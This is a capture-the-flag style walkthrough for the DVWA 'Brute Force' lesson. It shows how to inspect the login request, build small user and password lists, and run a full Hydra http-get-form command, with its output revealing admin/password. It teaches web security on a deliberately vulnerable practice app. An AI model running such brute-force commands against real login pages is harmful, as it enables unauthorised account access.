---
title: Brute Force
description: Damn Vulnerable Web App - Brute Force
extends: _layouts.documentation
section: content
---

# Brute Force

1\. Navigate to the brute force lesson.
Let's start by opening up the **Browser Developer Tools** with the keyboard shortcut `CTRL + SHIFT + I`.
Then open the **Network** tab so we can view the network request made when we submit the form.

>Hint: The developer console is part of a set of developer tools built right into most popular web browsers.
>We can use it to inspect what data the web page is sending back to the browser.
>You can learn more about what the developer tools can be used for [here](/essentials/browser-developer-tools).

<img src="/assets/images/walkthroughs/damn-vulnerable-web-app/brute-force/2-network-tab.PNG">

2\. Now let's fill out the form with a random guess and submit the form.
The purpose of this test submission is so we can inspect what the form sends back to the server using the **Firefox Developer Tools**.

<img src="/assets/images/walkthroughs/damn-vulnerable-web-app/brute-force/3-failed-login.PNG">

4\. Take a look at the request the browser sent to the server by opening the **Network** tab and then clicking on **Params** sub tab.
You can see that the request sends the entered user/password combo to the server under `username` and `password` fields in the **Query string**.

<img src="/assets/images/walkthroughs/damn-vulnerable-web-app/brute-force/4-params.PNG">

5\. Let's switch over to your kali instance, reference the [quickstart guide](/walkthroughs/damn-vulnerable-web-app/quickstart) if you need a refresher on how to do this. 
Once logged into you Kali instance, use a text editor like [vim](/tools/vim) to create a list of users, and a list of passwords to try.
Here is an example list of users and passwords to try:

```bash
root@49894cea06f8:~# cat users-list.txt
user
admin
administrator
root
dvwa
guest
```

```bash
root@49894cea06f8:~# cat passwords-list.txt
password
password1
p@ssword
123456
password!
admin
dvwa
```

>Hint: There are a variety of password dictionaries with popular passwords collections available for download (for example, checkout [Skull Security](https://wiki.skullsecurity.org/Passwords)). The full version of Kali Linux has an entire directory of password lists in the `/usr/share/wordlists/` directory. This directory has been excluded from Hacker Lab because of it's size.

6\. take note of the files you just created:
```bash
root@49894cea06f8:~# ls
passwords-list.txt  users-list.txt
```

7\. We're going to use a tool called **Hydra** to use those lists to brute force the login page.

* **-vV** - show verbose output
* **-L** - text file with list of usernames to try
* **-P** - text file with list of passwords to try
* **165.227.13.98** - the host you're trying to brute force. Replace this value with the IP address of your DVWA instance.
* **http-get-form** - the type of brute force you're attempting
* **"/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:H=Cookie: security=low; PHPSESSID=8dqtkqabovs2i5eerqt1rkhfj2:incorrect"** - required parameters for http-get-form type brute force attack.
    * /vulnerabilities/brute/ - url for the login page to brute force
    * username=^USER^&password=^PASS^ - username and password fields to use
    * incorrect - a string found on the page for a failed login so hydra can tell if it succeeded or not
    * H=Cookie: security=low; PHPSESSID=8dqtkqabovs2i5eerqt1rkhfj2 - cookies to send along with the request
* **-t 1** - number of threads to use
* **-w 5** - wait time for response in seconds
* **-W 5** - wait time between requests in seconds
* **-f** - stop trying after the first successful login attempt

> Tip: Use the command `hydra -h`, or checkout the [official documentation](https://github.com/vanhauser-thc/thc-hydra) to learn more about how the above parameters work. 

Here is the full command to run

**Important Note:**
* Replace `138.68.19.178` with the IP address of your DVWA instance.
* Replace `ufv95uanphuove4tetd8gml5c3` with the `PHPSESS` cookie value found under the **Cookies** Sub tab of the **Network** Panel.

```bash
hacker-lab@49894cea06f8:~# hydra 138.68.19.178 -vV -L ./users-list.txt -P ./passwords-list.txt http-get-form "/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:incorrect:H=Cookie: security=low; PHPSESSID=ufv95uanphuove4tetd8gml5c3" -t 1 -w 2 -W 2 -f
```

And here are the results:
```bash
Hydra v8.9.1 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

[WARNING] the waittime you set is low, this can result in errornous results
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-07-19 21:42:16
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 1 task per 1 server, overall 1 task, 49 login tries (l:7/p:7), ~49 tries per task
[DATA] attacking http-get-form://134.209.51.169:80/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:incorrect:H=Cookie: security=low; PHPSESSID=ufv95uanphuove4tetd8gml5c3
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[ATTEMPT] target 134.209.51.169 - login "user" - pass "password" - 1 of 49 [child 0] (0/0)
[ATTEMPT] target 134.209.51.169 - login "user" - pass "password1" - 2 of 49 [child 0] (0/0)
[ATTEMPT] target 134.209.51.169 - login "user" - pass "p@ssword" - 3 of 49 [child 0] (0/0)
[ATTEMPT] target 134.209.51.169 - login "user" - pass "123456" - 4 of 49 [child 0] (0/0)
[ATTEMPT] target 134.209.51.169 - login "user" - pass "password!" - 5 of 49 [child 0] (0/0)
[ATTEMPT] target 134.209.51.169 - login "user" - pass "admin" - 6 of 49 [child 0] (0/0)
[ATTEMPT] target 134.209.51.169 - login "user" - pass "dvwa" - 7 of 49 [child 0] (0/0)
[ATTEMPT] target 134.209.51.169 - login "admin" - pass "password" - 8 of 49 [child 0] (0/0)
[80][http-get-form] host: 134.209.51.169   login: admin   password: password
[STATUS] attack finished for 134.209.51.169 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2019-07-19 21:43:06

```

8\. hydra just tried all possible combinations of usernames and passwords until it found one that worked.
Try typing in the user credentials:

<img src="/assets/images/walkthroughs/damn-vulnerable-web-app/brute-force/5-success.PNG">